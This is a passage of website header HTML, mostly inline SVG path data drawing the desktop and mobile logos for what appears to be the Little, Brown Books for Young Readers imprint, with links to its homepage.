d="M117.21,91c0,.43,0,1.28,0,1.63,0,2.15-1.17,3.57-3.39,3.57s-3.41-1.42-3.4-3.57c0-.33,0-1.09,0-1.52a30.25,30.25,0,0,0-.08-3.4,4.43,4.43,0,0,0,1.26,0,30.84,30.84,0,0,0-.19,3.4c0,.43,0,1.25,0,1.62,0,1.57.78,2.54,2.36,2.54s2.34-1,2.35-2.54c0-.37,0-1.19,0-1.62a28.27,28.27,0,0,0-.18-3.4,4.1,4.1,0,0,0,1.26,0C117.18,88.65,117.21,89.87,117.21,91Z"/><path class="lbyr-cls-2" d="M127.38,95.94a2.75,2.75,0,0,0-1.13.23c-1.9-2.61-3.47-4.62-5.28-6.73-.08,2.2,0,4.42.07,6.6a6.22,6.22,0,0,0-1.22,0,71.43,71.43,0,0,0,.16-8.27,6,6,0,0,0,1.2,0c2,2.86,3.47,4.78,5.24,6.89a58.36,58.36,0,0,0-.12-6.92,5.62,5.62,0,0,0,1.16,0C127.34,90.38,127.3,94.28,127.38,95.94Z"/><path class="lbyr-cls-2" d="M134.39,96.17c-2.61,0-4.67-1.67-4.67-4.34a4.25,4.25,0,0,1,4.5-4.23,5.3,5.3,0,0,1,3,.87,4.43,4.43,0,0,0-.49.94,3.72,3.72,0,0,0-2.53-1,3.24,3.24,0,0,0-3.35,3.4,3.38,3.38,0,0,0,3.53,3.51,3.52,3.52,0,0,0,1.83-.46,16,16,0,0,0,0-2.4c-.42,0-1.31,0-1.74,0a4.22,4.22,0,0,0,0-.94,23.08,23.08,0,0,0,2.88.06,23.48,23.48,0,0,0,0,3.56A5.1,5.1,0,0,1,134.39,96.17Z"/><path class="lbyr-cls-2" d="M148.63,96.25c-.48-.69-.94-1.35-1.43-2a15.49,15.49,0,0,0-1.36-1.66,2.16,2.16,0,0,0-.59-.08,3.08,3.08,0,0,0-.65,0,34.35,34.35,0,0,0,.14,3.47,9.54,9.54,0,0,0-1.31,0c.13-1.6.14-2.9.14-4.33a32.56,32.56,0,0,0-.14-3.85,10.62,10.62,0,0,1,2.19-.32c1.49,0,2.8.75,2.8,2.37a2.56,2.56,0,0,1-1.59,2.28c.17.2.71.87,1.25,1.55a19.69,19.69,0,0,0,1.61,1.8A3.4,3.4,0,0,0,148.63,96.25Zm-1.7-7.35a1.62,1.62,0,0,0-1.31-.59,3.26,3.26,0,0,0-1,.12c-.05,1.22-.05,2.21-.05,3.31a2.91,2.91,0,0,0,.64.07c1.29,0,2-.64,2-1.89A1.63,1.63,0,0,0,146.93,88.9Z"/><path class="lbyr-cls-2" d="M151.56,96.1c.11-1.54.18-3.09.18-4.63a33.57,33.57,0,0,0-.18-3.79,22.48,22.48,0,0,0,4.34,0,4.18,4.18,0,0,0,0,1c-1.06-.1-2.09-.05-3.15-.05,0,.89,0,1.79,0,2.67a20.45,20.45,0,0,0,2.82-.1,5.46,5.46,0,0,0,0,1c-.92-.09-1.88-.09-2.82-.09,0,1,0,2,.08,3a14.69,14.69,0,0,0,3.38-.06,8.85,8.85,0,0,0,0,1A44.25,44.25,0,0,0,151.56,96.1Z"/><path class="lbyr-cls-2" d="M164.6,96.25c-.3-1-.71-2.16-1-3-1.17,0-2.53,0-3.51,0-.36.93-.7,2.06-1,3a11,11,0,0,0-1.22-.46,54,54,0,0,0,3.27-8.15,4.53,4.53,0,0,0,1.47,0,69.79,69.79,0,0,0,3.29,8.15A12.75,12.75,0,0,0,164.6,96.25Zm-2.79-7.48c-.48,1.13-1,2.58-1.44,3.64.84,0,2,0,2.87,0C162.82,91.35,162.25,89.77,161.81,88.77Z"/><path class="lbyr-cls-2" d="M170.33,96.17a13,13,0,0,1-2.62-.34c.12-1.64.12-2.72.12-4a34.13,34.13,0,0,0-.1-3.79,9.78,9.78,0,0,1,1.33-.3,13.88,13.88,0,0,1,1.64-.12c2.6,0,4.72,1.23,4.72,4.13S173.14,96.17,170.33,96.17Zm.37-7.74a9.16,9.16,0,0,0-1.76.2c0,1.07-.08,2.12-.08,3.19s0,2.21.08,3.34a5.33,5.33,0,0,0,1.46.18c2.31,0,3.87-1.23,3.87-3.61A3.3,3.3,0,0,0,170.7,88.43Z"/><path class="lbyr-cls-2" d="M177.67,96.1c.12-1.54.19-3.09.19-4.63a31.25,31.25,0,0,0-.19-3.79,22.37,22.37,0,0,0,4.33,0,8.34,8.34,0,0,0,0,1c-1-.1-2.08-.05-3.13-.05-.05.89-.05,1.79-.05,2.67a20.34,20.34,0,0,0,2.82-.1,5.46,5.46,0,0,0,0,1c-.93-.09-1.87-.09-2.82-.09,0,1,0,2,.09,3a14.61,14.61,0,0,0,3.37-.06,8.85,8.85,0,0,0,0,1A44.27,44.27,0,0,0,177.67,96.1Z"/><path class="lbyr-cls-2" d="M189.5,96.25c-.48-.69-.94-1.35-1.42-2a15.49,15.49,0,0,0-1.36-1.66,2.18,2.18,0,0,0-.6-.08,3.12,3.12,0,0,0-.65,0,34.42,34.42,0,0,0,.15,3.47,9.69,9.69,0,0,0-1.32,0c.13-1.6.14-2.9.14-4.33a30.55,30.55,0,0,0-.14-3.85,10.72,10.72,0,0,1,2.19-.32c1.49,0,2.8.75,2.8,2.37a2.55,2.55,0,0,1-1.58,2.28c.16.2.71.87,1.25,1.55a18.21,18.21,0,0,0,1.6,1.8A3.65,3.65,0,0,0,189.5,96.25Zm-1.7-7.35a1.62,1.62,0,0,0-1.31-.59,3.43,3.43,0,0,0-1,.12c-.05,1.22-.05,2.21-.05,3.31a3,3,0,0,0,.64.07c1.29,0,2-.64,2-1.89A1.64,1.64,0,0,0,187.8,88.9Z"/><path class="lbyr-cls-2" d="M194.58,96.14a3.15,3.15,0,0,1-2.39-1,2.43,2.43,0,0,0,.54-.9,2.35,2.35,0,0,0,1.89,1A1.41,1.41,0,0,0,196.15,94c0-1-.9-1.5-1.67-2-1-.6-1.94-1.09-1.94-2.48s1.34-1.92,2.46-1.92a2.81,2.81,0,0,1,2,.77,2.68,2.68,0,0,0-.52.86,1.89,1.89,0,0,0-1.51-.84c-.8,0-1.34.4-1.34,1.2s.9,1.26,1.53,1.64c1.1.66,2.08,1.16,2.08,2.63A2.44,2.44,0,0,1,194.58,96.14Z"/></svg>
	</a>
	<a class="site-header__branding--imprint-header-logo__mobile" href="https://www.lbyr.com/">
		<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 214 98.1"><defs><style>.lbyrmobile-cls-1{fill:#c48d42;}.lbyrmobile-cls-2{fill:#FFFFFF;}.lbyrmobile-cls-3{fill:#000;}</style></defs><title>lbyr5</title><path class="lbyrmobile-cls-1" d="M165.82,29.56a28,28,0,1,1-55.9,0,28,28,0,1,1,55.9,0m-61.84,0a28,28,0,1,1-55.9,0,28,28,0,1,1,55.9,0"/><path class="lbyrmobile-cls-2" d="M99.09,29.56a23,23,0,1,1-46.07,0,23,23,0,1,1,46.07,0m61.81,0a23,23,0,1,1-46.06,0,23,23,0,1,1,46.06,0"/><path class="lbyrmobile-cls-3" d="M87.53,43.08c-.13.56-.36.7-.77.7-2.17,0-13.45-.14-16.3-.14l-4.93.21V41.19c0-.32.18-.42.44-.42.55,0,3.54.08,4.76-.06a18.87,18.87,0,0,0,.14-2.51V19.77a18.87,18.87,0,0,0-.14-2.51c-1.22-.13-4.21-.13-4.76-.13-.26,0-.44-.1-.44-.43V14.19c1.35.05,6.42.14,7.42.14s5.49-.09,6.9-.14V16.7c0,.33-.18.43-.46.43-.54,0-3.36,0-4.58.13a12.78,12.78,0,0,0-.14,2.47V37.5c0,1.39.09,2.41.14,2.93.36,0,1.81.14,2.94.14h6.89l1-7.36,2.81.23c.27.05.22.33.17.6Z"/><path class="lbyrmobile-cls-3" d="M139.42,29.79h-3.94v7.27a14.58,14.58,0,0,0,.35,3.3,26,26,0,0,0,4.76.34c3.48,0,6.27-1.36,6.27-5,0-4.23-3.33-5.87-7.44-5.87m3.46-11.6a6.41,6.41,0,0,0-3.83-1,22.46,22.46,0,0,0-3.57.32v9.19c.72.09,3,.14,3.85.14a5,5,0,0,0,5.31-5.2,4.18,4.18,0,0,0-1.76-3.48m-2.15,25.56c-1.77,0-5.31-.14-7.11-.14s-6.1.1-6.91.14V41.24c0-.33.22-.42.45-.42.59,0,3.15,0,4.37-.14a12.91,12.91,0,0,0,.14-2.51V19.91a18.49,18.49,0,0,0-.23-2.65c-.95-.09-3.92-.14-4.33-.14s-.44-.09-.44-.32V14.2c.85,0,5.32.14,6.45.14s4.67-.14,5.75-.14c3.94,0,5.45.6,7,1.72a6.64,6.64,0,0,1,2.62,5.15,7,7,0,0,1-5.2,7c5.25.6,7.37,4.23,7.37,7.62,0,5.53-4.37,8-10,8"/><path class="lbyrmobile-cls-2" d="M45.88,81.24a2.2,2.2,0,0,0-.8-.51,22.83,22.83,0,0,0,.8-2.82c.07-.24.21-.33.54-.33a1.4,1.4,0,0,1,.86.78A19,19,0,0,1,45.88,81.24Z"/><path class="lbyrmobile-cls-2" d="M.92,79.29a47.33,47.33,0,0,0,0-8.83,6,6,0,0,0,2,0,71.38,71.38,0,0,0-.07,7.26,16.29,16.29,0,0,0,3.77-.2,6,6,0,0,0,0,1.74C4.49,79.19,2.85,79.23.92,79.29Z"/><path class="lbyrmobile-cls-2" d="M10.19,79.25a14,14,0,0,0-2,0,51.76,51.76,0,0,0,0-8.72,6.05,6.05,0,0,0,2.08,0A46.4,46.4,0,0,0,10.19,79.25Z"/><path class="lbyrmobile-cls-2" d="M16.75,71.93c-.06,1.31-.1,2.45-.08,3.63s.08,2.28.19,3.69a13.59,13.59,0,0,0-2,0c.1-1.28.14-2.56.16-3.79s0-2.37,0-3.51c-.77,0-2.17,0-2.94.06a6.55,6.55,0,0,0,0-1.53c1.38.07,2.61.11,3.81.11s2.51,0,3.91-.11a7.74,7.74,0,0,0,0,1.52C18.78,72,17.82,71.93,16.75,71.93Z"/><path class="lbyrmobile-cls-2" d="M25.81,71.93c0,1.31-.08,2.45-.07,3.63s.07,2.28.19,3.69a13.59,13.59,0,0,0-2,0c.1-1.28.14-2.56.16-3.79s0-2.37,0-3.51c-.77,0-2.17,0-2.94.06a6,6,0,0,0,0-1.53c1.38.07,2.6.11,3.81.11s2.51,0,3.91-.11a9.67,9.67,0,0,0,0,1.52C27.85,72,26.89,71.93,25.81,71.93Z"/><path class="lbyrmobile-cls-2" d="M30.69,79.29a50,50,0,0,0,0-8.83,5.92,5.92,0,0,0,2,0,71.38,71.38,0,0,0-.07,7.26,16.35,16.35,0,0,0,3.78-.2,6,6,0,0,0,0,1.74C34.25,79.19,32.6,79.23,30.69,79.29Z"/><path class="lbyrmobile-cls-2" d="M38,79.3c.11-1.53.2-3,.2-4.49A41.23,41.23,0,0,0,38,70.43a23.68,23.68,0,0,0,5.05,0,5.11,5.11,0,0,0,0,1.7,29.07,29.07,0,0,0-3.18-.08c0,.7,0,1.19,0,1.92a19.12,19.12,0,0,0,2.83-.15,7.52,7.52,0,0,0,0,1.71,27.9,27.9,0,0,0-2.83-.12c0,.83,0,1.45.07,2.28a17.53,17.53,0,0,0,3.4-.13,3.71,3.71,0,0,0,0,1.69C41.45,79.17,39.83,79.22,38,79.3Z"/><path class="lbyrmobile-cls-2" d="M55.9,79.35a23.41,23.41,0,0,1-2.53-.22c.12-1.58.18-2.88.19-4.14s-.05-2.69-.17-4.36a19.66,19.66,0,0,1,2.39-.24c1.46,0,3.18.44,3.18,2.36a2.32,2.32,0,0,1-1.49,1.84,2.35,2.35,0,0,1,1.9,2C59.37,78.74,57.62,79.35,55.9,79.35Zm-.1-4h-.58V76.6c0,.44,0,.87.07,1.31a5.35,5.35,0,0,0,.79.06c.73,0,1.63-.28,1.63-1.38C57.71,75.8,56.86,75.34,55.8,75.34Zm0-3.59h-.5c0,.4-.05.79-.05,1.15s0,.73,0,1.11c.21,0,.44,0,.5,0,.82,0,1.43-.34,1.43-1.15S56.57,71.75,55.78,71.75Z"/><path class="lbyrmobile-cls-2" d="M66.9,79.6c-.45-.62-.88-1.24-1.33-1.85A22.47,22.47,0,0,0,64,75.83h-.7a24.06,24.06,0,0,0,.2,3.44,14.16,14.16,0,0,0-2.06,0,51.45,51.45,0,0,0,0-8.51,9.51,9.51,0,0,1,2.52-.4c1.64,0,3.12.8,3.12,2.6a2.85,2.85,0,0,1-1.39,2.34c.42.54.82,1,1.27,1.55s1,1.08,1.6,1.68A6.76,6.76,0,0,0,66.9,79.6Zm-2-7.54a1.24,1.24,0,0,0-.93-.33,3.28,3.28,0,0,0-.63.06c0,1,0,1.72,0,2.68h.29c1.07,0,1.67-.5,1.67-1.49A1.2,1.2,0,0,0,64.91,72.06Z"/><path class="lbyrmobile-cls-2" d="M74,79.33a4.47,4.47,0,1,1,0-8.94,4.39,4.39,0,0,1,4.53,4.49A4.47,4.47,0,0,1,74,79.33Zm0-7.49a3,3,0,1,0,2.75,3A2.78,2.78,0,0,0,74,71.84Z"/><path class="lbyrmobile-cls-2" d="M89.84,79.23a8.09,8.09,0,0,0-1.65,0c-.71-2.4-1.37-4.45-2.15-6.37-.77,2-1.48,4.16-2.16,6.34a11.49,11.49,0,0,0-1.66,0,65.3,65.3,0,0,0-2.47-8.52,5,5,0,0,0,2-.46,48.84,48.84,0,0,0,1.43,6.44,39.86,39.86,0,0,0,1.89-6.16A4.87,4.87,0,0,0,87,70.41a49.05,49.05,0,0,0,1.93,6.25,50.46,50.46,0,0,0,1.4-6.34,5.82,5.82,0,0,0,2,.41A75.49,75.49,0,0,0,89.84,79.23Z"/><path class="lbyrmobile-cls-2" d="M102.39,79.12a3.76,3.76,0,0,0-1.54.32A72.07,72.07,0,0,0,96,73.3a50.26,50.26,0,0,0,.13,6,6.31,6.31,0,0,0-1.94,0,70.68,70.68,0,0,0,.2-8.82,5.51,5.51,0,0,0,1.67,0,64.05,64.05,0,0,0,4.7,6.2,46.71,46.71,0,0,0-.18-6.25,4.53,4.53,0,0,0,1.87,0A82.26,82.26,0,0,0,102.39,79.12Z"/><path class="lbyrmobile-cls-2" d="M115.35,79.57a18.62,18.62,0,0,0-.86-2.48c-1,0-2.43,0-3.37,0a19,19,0,0,0-.88,2.46,8.26,8.26,0,0,0-1.87-.7,69.82,69.82,0,0,0,3.47-8.49,4.26,4.26,0,0,0,1.85,0c1,2.51,2.31,5.94,3.49,8.51A7.18,7.18,0,0,0,115.35,79.57Zm-2.53-7.11c-.42.9-.92,2.51-1.2,3.3a23.22,23.22,0,0,0,2.36,0C113.7,74.92,113.21,73.36,112.82,72.46Z"/><path class="lbyrmobile-cls-2" d="M127.37,79.12a3.67,3.67,0,0,0-1.54.32A72.12,72.12,0,0,0,121,73.3a52.45,52.45,0,0,0,.13,6,6.31,6.31,0,0,0-1.94,0,67,67,0,0,0,.19-8.82,5.58,5.58,0,0,0,1.68,0,64,64,0,0,0,4.71,6.2,46.71,46.71,0,0,0-.18-6.25,4.53,4.53,0,0,0,1.87,0A79.63,79.63,0,0,0,127.37,79.12Z"/><path class="lbyrmobile-cls-2" d="M133.07,79.33a14.4,14.4,0,0,1-2.95-.37c.08-1.21.12-2.68.14-4.1s0-3-.11-4a10.17,10.17,0,0,1,3.28-.51c2.75,0,5,1.29,5,4.32S136,79.33,133.07,79.33Zm.36-7.49A7.27,7.27,0,0,0,132,72c0,1-.09,2-.09,3s0,1.83.09,2.8a6.15,6.15,0,0,0,1.13.09c2.11,0,3.49-1.06,3.49-3.17A2.92,2.92,0,0,0,133.43,71.84Z"/><path class="lbyrmobile-cls-2" d="M151.39,72.87a3.14,3.14,0,0,0-2.39-1,2.88,2.88,0,0,0-2.88,3,3,3,0,0,0,3.06,3,3.47,3.47,0,0,0,2.14-.81,3,3,0,0,0,.76,1.32,5.47,5.47,0,0,1-2.92,1c-2.94,0-4.84-1.72-4.84-4.49a4.43,4.43,0,0,1,4.74-4.45,5.22,5.22,0,0,1,3.16,1.06A3.76,3.76,0,0,0,151.39,72.87Z"/><path class="lbyrmobile-cls-2" d="M158,79.33a4.46,4.46,0,0,1-4.53-4.45,4.55,4.55,0,0,1,9.09,0A4.48,4.48,0,0,1,158,79.33Zm0-7.49a3,3,0,1,0,2.75,3A2.78,2.78,0,0,0,158,71.84Z"/><path class="lbyrmobile-cls-2" d="M173.58,79.37c-.12-2-.33-4.42-.53-6.52-.79,2-1.7,4.68-2.26,6.43a8.77,8.77,0,0,0-1.7,0c-.53-1.76-1.38-4.21-2.28-6.4-.14,2.21-.34,4.66-.41,6.46a6.3,6.3,0,0,0-1.87-.12c.47-2.8.83-6,1.08-8.81a3.78,3.78,0,0,0,1.89,0A68.34,68.34,0,0,0,170,77.32a51.5,51.5,0,0,0,2.27-6.86,4.17,4.17,0,0,0,2,0c.37,3.31.68,5.72,1.19,8.72A6.25,6.25,0,0,0,173.58,79.37Z"/><path class="lbyrmobile-cls-2" d="M180.19,76.1c-.13,0-.33,0-.65,0,0,1,.09,2,.18,3.22a8.12,8.12,0,0,0-2,0,59.47,59.47,0,0,0,0-8.65,13.12,13.12,0,0,1,2.57-.29c1.76,0,3.36.93,3.36,2.83S182,76.1,180.19,76.1Zm.09-4.37a5.11,5.11,0,0,0-.69,0c0,1-.05,1.89-.05,2.88a3.63,3.63,0,0,0,.67.07,1.5,1.5,0,0,0,1.63-1.54A1.44,1.44,0,0,0,180.28,71.73Z"/><path class="lbyrmobile-cls-2" d="M190.81,79.57a17.23,17.23,0,0,0-.87-2.48c-1,0-2.42,0-3.36,0a20.64,20.64,0,0,0-.88,2.46,8.16,8.16,0,0,0-1.88-.7,70,70,0,0,0,3.48-8.49,4.26,4.26,0,0,0,1.85,0c1,2.51,2.31,5.94,3.49,8.51A7.32,7.32,0,0,0,190.81,79.57Zm-2.53-7.11c-.41.9-.92,2.51-1.2,3.3a23.22,23.22,0,0,0,2.36,0C189.16,74.92,188.67,73.36,188.28,72.46Z"/><path class="lbyrmobile-cls-2" d="M202.83,79.12a3.67,3.67,0,0,0-1.54.32,72.12,72.12,0,0,0-4.83-6.14,50.26,50.26,0,0,0,.13,6,6.25,6.25,0,0,0-1.93,0,70.62,70.62,0,0,0,.18-8.82,5.58,5.58,0,0,0,1.68,0,62.43,62.43,0,0,0,4.71,6.2,48.45,48.45,0,0,0-.19-6.25,4.58,4.58,0,0,0,1.88,0A77.17,77.17,0,0,0,202.83,79.12Z"/><path class="lbyrmobile-cls-2" d="M209.71,75.82a26,26,0,0,0,.11,3.46,5.6,5.6,0,0,0-2,0,25.75,25.75,0,0,0,.09-3.46,32.25,32.25,0,0,0-3.3-4.88,5.25,5.25,0,0,0,1.74-.75,23.59,23.59,0,0,0,2.48,4.19,23.22,23.22,0,0,0,2.44-4.2A4.78,4.78,0,0,0,213,71,30,30,0,0,0,209.71,75.82Z"/><path class="lbyrmobile-cls-2" d="M18.71,96.18a17.41,17.41,0,0,1-2-.17,43.91,43.91,0,0,0,.15-4.4,37.41,37.41,0,0,0-.13-3.84,13.81,13.81,0,0,1,1.89-.17c1.35,0,2.88.39,2.88,2.09a2,2,0,0,1-1.55,1.89A2.22,2.22,0,0,1,22,93.68C22,95.61,20.33,96.18,18.71,96.18ZM18.62,92a4.58,4.58,0,0,0-.78,0v1.13c0,.66,0,1.61.08,2a2.38,2.38,0,0,0,1,.17,1.74,1.74,0,0,0,2-1.75C20.88,92.52,19.59,92,18.62,92Zm0-3.7a3.06,3.06,0,0,0-.66.06c0,.57-.07.84-.07,1.45v1.4a3.26,3.26,0,0,0,.69.07c.86,0,1.79-.39,1.79-1.5S19.54,88.33,18.58,88.33Z"/><path class="lbyrmobile-cls-2" d="M28,96.17a4.23,4.23,0,0,1-4.24-4.27,4.26,4.26,0,1,1,8.51,0A4.25,4.25,0,0,1,28,96.17Zm0-7.73c-2.11,0-3.08,1.75-3.08,3.45A3.11,3.11,0,1,0,28,88.44Z"/><path class="lbyrmobile-cls-2" d="M38.32,96.17a4.23,4.23,0,0,1-4.24-4.27,4.26,4.26,0,1,1,8.51,0A4.25,4.25,0,0,1,38.32,96.17Zm0-7.73c-2.11,0-3.07,1.75-3.07,3.45a3.11,3.11,0,1,0,3.07-3.45Z"/><path class="lbyrmobile-cls-2" d="M50.41,96.24a47.27,47.27,0,0,0-4.44-4c0,1.27.05,2.67.15,3.85a8.31,8.31,0,0,0-1.32,0A36.07,36.07,0,0,0,45,91.88a38.17,38.17,0,0,0-.13-4.14,8.31,8.31,0,0,0,1.32,0c-.09,1-.17,2.44-.17,3.49a25.17,25.17,0,0,0,3.69-3.68,4.71,4.71,0,0,0,.77.84c-1.25,1-2.37,2.15-3.52,3.23a37.48,37.48,0,0,0,4.31,3.75A3.54,3.54,0,0,0,50.41,96.24Z"/><path class="lbyrmobile-cls-2" d="M55.25,96.14a3.17,3.17,0,0,1-2.4-1,2.19,2.19,0,0,0,.54-.9,2.38,2.38,0,0,0,1.9,1A1.41,1.41,0,0,0,56.81,94c0-1-.89-1.5-1.66-2-1-.6-1.95-1.09-1.95-2.48s1.35-1.92,2.46-1.92a2.82,2.82,0,0,1,2,.77,2.51,2.51,0,0,0-.52.86,1.89,1.89,0,0,0-1.51-.84c-.8,0-1.34.4-1.34,1.2s.9,1.26,1.53,1.64c1.1.66,2.08,1.16,2.08,2.63A2.44,2.44,0,0,1,55.25,96.14Z"/><path class="lbyrmobile-cls-2" d="M64.79,88.63c0,1,0,1.93,0,2.88,1,0,2.06,0,3.1-.08a3.44,3.44,0,0,0,0,1c-1,0-2.06-.06-3.1-.06,0,1.13,0,2.49.07,3.71a5.35,5.35,0,0,0-1.2,0c.12-1.52.15-3.07.15-4.6,0-1.26-.1-2.5-.18-3.74a36.22,36.22,0,0,0,4.42,0,3.29,3.29,0,0,0,0,1C67.2,88.63,65.6,88.6,64.79,88.63Z"/><path class="lbyrmobile-cls-2" d="M74,96.17a4.23,4.23,0,0,1-4.25-4.27,4.26,4.26,0,1,1,8.51,0A4.25,4.25,0,0,1,74,96.17Zm0-7.73c-2.12,0-3.08,1.75-3.08,3.45a3.1,3.1,0,1,0,6.18,0C77.09,90.19,76.11,88.44,74,88.44Z"/><path class="lbyrmobile-cls-2" d="M85.66,96.25c-.47-.69-.93-1.35-1.42-2a15.49,15.49,0,0,0-1.36-1.66,2.16,2.16,0,0,0-.59-.08,3.12,3.12,0,0,0-.66,0A34.42,34.42,0,0,0,81.78,96a9.69,9.69,0,0,0-1.32,0c.13-1.6.15-2.9.15-4.33a30.53,30.53,0,0,0-.15-3.85,10.62,10.62,0,0,1,2.19-.32c1.49,0,2.8.75,2.8,2.37a2.57,2.57,0,0,1-1.58,2.28c.17.2.7.87,1.25,1.55a19.48,19.48,0,0,0,1.59,1.8A3.6,3.6,0,0,0,85.66,96.25ZM84,88.9a1.66,1.66,0,0,0-1.32-.59,3.32,3.32,0,0,0-1,.12c-.05,1.22-.05,2.21-.05,3.31a2.91,2.91,0,0,0,.64.07c1.29,0,2-.64,2-1.89A1.69,1.69,0,0,0,84,88.9Z"/><path class="lbyrmobile-cls-2" d="M95.7,92.76A31.07,31.07,0,0,0,95.8,96a4.94,4.94,0,0,0-1.33,0,32.58,32.58,0,0,0,.1-3.28c-.86-1.46-2.15-3.44-3.13-4.77.36-.14.71-.31,1.07-.47.85,1.51,1.75,3,2.61,4.43.87-1.43,1.79-2.92,2.64-4.43.35.16.7.33,1.07.47C97.85,89.32,96.56,91.3,95.7,92.76Z"/><path class="lbyrmobile-cls-2" d="M104,96.17a4.23,4.23,0,0,1-4.24-4.27,4.26,4.26,0,1,1,8.51,0A4.25,4.25,0,0,1,104,96.17Zm0-7.73c-2.11,0-3.08,1.75-3.08,3.45A3.11,3.11,0,1,0,104,88.44Z"/><path class="lbyrmobile-cls-2" d="M117.21,91c0,.43,0,1.28,0,1.63,0,2.15-1.17,3.57-3.39,3.57s-3.41-1.42-3.4-3.57c0-.33,0-1.09,0-1.52a30.25,30.25,0,0,0-.08-3.4,4.43,4.43,0,0,0,1.26,0,30.84,30.84,0,0,0-.19,3.4c0,.43,0,1.25,0,1.62,0,1.57.78,2.54,2.36,2.54s2.34-1,2.35-2.54c0-.37,0-1.19,0-1.62a28.27,28.27,0,0,0-.18-3.4,4.1,4.1,0,0,0,1.26,0C117.18,88.65,117.21,89.87,117.21,91Z"/><path class="lbyrmobile-cls-2" d="M127.38,95.94a2.75,2.75,0,0,0-1.13.23c-1.9-2.61-3.47-4.62-5.28-6.73-.08,2.2,0,4.42.07,6.6a6.22,6.22,0,0,0-1.22,0,71.43,71.43,0,0,0,.16-8.27,6,6,0,0,0,1.2,0c2,2.86,3.47,4.78,5.24,6.89a58.36,58.36,0,0,0-.12-6.92,5.62,5.62,0,0,0,1.16,0C127.34,90.38,127.3,94.28,127.38,95.94Z"/><path class="lbyrmobile-cls-2" d="M134.39,96.17c-2.61,0-4.67-1.67-4.67-4.34a4.25,4.25,0,0,1,4.5-4.23,5.3,5.3,0,0,1,3,.87,4.43,4.43,0,0,0-.49.94,3.72,3.72,0,0,0-2.53-1,3.24,3.24,0,0,0-3.35,3.4,3.38,3.38,0,0,0,3.53,3.51,3.52,3.52,0,0,0,1.83-.46,16,16,0,0,0,0-2.4c-.42,0-1.31,0-1.74,0a4.22,4.22,0,0,0,0-.94,23.08,23.08,0,0,0,2.88.06,23.48,23.48,0,0,0,0,3.56A5.1,5.1,0,0,1,134.39,96.17Z"/><path class="lbyrmobile-cls-2" d="M148.63,96.25c-.48-.69-.94-1.35-1.43-2a15.49,15.49,0,0,0-1.36-1.66,2.16,2.16,0,0,0-.59-.08,3.08,3.08,0,0,0-.65,0,34.35,34.35,0,0,0,.14,3.47,9.54,9.54,0,0,0-1.31,0c.13-1.6.14-2.9.14-4.33a32.56,32.56,0,0,0-.14-3.85,10.62,10.62,0,0,1,2.19-.32c1.49,0,2.8.75,2.8,2.37a2.56,2.56,0,0,1-1.59,2.28c.17.2.71.87,1.25,1.55a19.69,19.69,0,0,0,1.61,1.8A3.4,3.4,0,0,0,148.63,96.25Zm-1.7-7.35a1.62,1.62,0,0,0-1.31-.59,3.26,3.26,0,0,0-1,.12c-.05,1.22-.05,2.21-.05,3.31a2.91,2.91,0,0,0,.64.07c1.29,0,2-.64,2-1.89A1.63,1.63,0,0,0,146.93,88.9Z"/><path class="lbyrmobile-cls-2" d="M151.56,96.1c.11-1.54.18-3.09.18-4.63a33.57,33.57,0,0,0-.18-3.79,22.48,22.48,0,0,0,4.34,0,4.18,4.18,0,0,0,0,1c-1.06-.1-2.09-.05-3.15-.05,0,.89,0,1.79,0,2.67a20.45,20.45,0,0,0,2.82-.1,5.46,5.46,0,0,0,0,1c-.92-.09-1.88-.09-2.82-.09,0,1,0,2,.08,3a14.69,14.69,0,0,0,3.38-.06,8.85,8.85,0,0,0,0,1A44.25,44.25,0,0,0,151.56,96.1Z"/><path class="lbyrmobile-cls-2" d="M164.6,96.25c-.3-1-.71-2.16-1-3-1.17,0-2.53,0-3.51,0-.36.93-.7,2.06-1,3a11,11,0,0,0-1.22-.46,54,54,0,0,0,3.27-8.15,4.53,4.53,0,0,0,1.47,0,69.79,69.79,0,0,0,3.29,8.15A12.75,12.75,0,0,0,164.6,96.25Zm-2.79-7.48c-.48,1.13-1,2.58-1.44,3.64.84,0,2,0,2.87,0C162.82,91.35,162.25,89.77,161.81,88.77Z"/><path class="lbyrmobile-cls-2" d="M170.33,96.17a13,13,0,0,1-2.62-.34c.12-1.64.12-2.72.12-4a34.13,34.13,0,0,0-.1-3.79,9.78,9.78,0,0,1,1.33-.3,13.88,13.88,0,0,1,1.64-.12c2.6,0,4.72,1.23,4.72,4.13S173.14,96.17,170.33,96.17Zm.37-7.74a9.16,9.16,0,0,0-1.76.2c0,1.07-.08,2.12-.08,3.19s0,2.21.08,3.34a5.33,5.33,0,0,0,1.46.18c2.31,0,3.87-1.23,3.87-3.61A3.3,3.3,0,0,0,170.7,88.43Z"/><path class="lbyrmobile-cls-2" d="M177.67,96.1c.12-1.54.19-3.09.19-4.63a31.25,31.25,0,0,0-.19-3.79,22.37,22.37,0,0,0,4.33,0,8.34,8.34,0,0,0,0,1c-1-.1-2.08-.05-3.13-.05-.05.89-.05,1.79-.05,2.67a20.34,20.34,0,0,0,2.82-.1,5.46,5.46,0,0,0,0,1c-.93-.09-1.87-.09-2.82-.09,0,1,0,2,.09,3a14.61,14.61,0,0,0,3.37-.06,8.85,8.85,0,0,0,0,1A44.27,44.27,0,0,0,177.67,96.1Z"/><path class="lbyrmobile-cls-2" d="M189.5,96.25c-.48-.69-.94-1.35-1.42-2a15.49,15.49,0,0,0-1.36-1.66,2.18,2.18,0,0,0-.6-.08,3.12,3.12,0,0,0-.65,0,34.42,34.42,0,0,0,.15,3.47,9.69,9.69,0,0,0-1.32,0c.13-1.6.14-2.9.14-4.33a30.55,30.55,0,0,0-.14-3.85,10.72,10.72,0,0,1,2.19-.32c1.49,0,2.8.75,2.8,2.37a2.55,2.55,0,0,1-1.58,2.28c.16.2.71.87,1.25,1.55a18.21,18.21,0,0,0,1.6,1.8A3.65,3.65,0,0,0,189.5,96.25Zm-1.7-7.35a1.62,1.62,0,0,0-1.31-.59,3.43,3.43,0,0,0-1,.12c-.05,1.22-.05,2.21-.05,3.31a3,3,0,0,0,.64.07c1.29,0,2-.64,2-1.89A1.64,1.64,0,0,0,187.8,88.9Z"/><path class="lbyrmobile-cls-2" 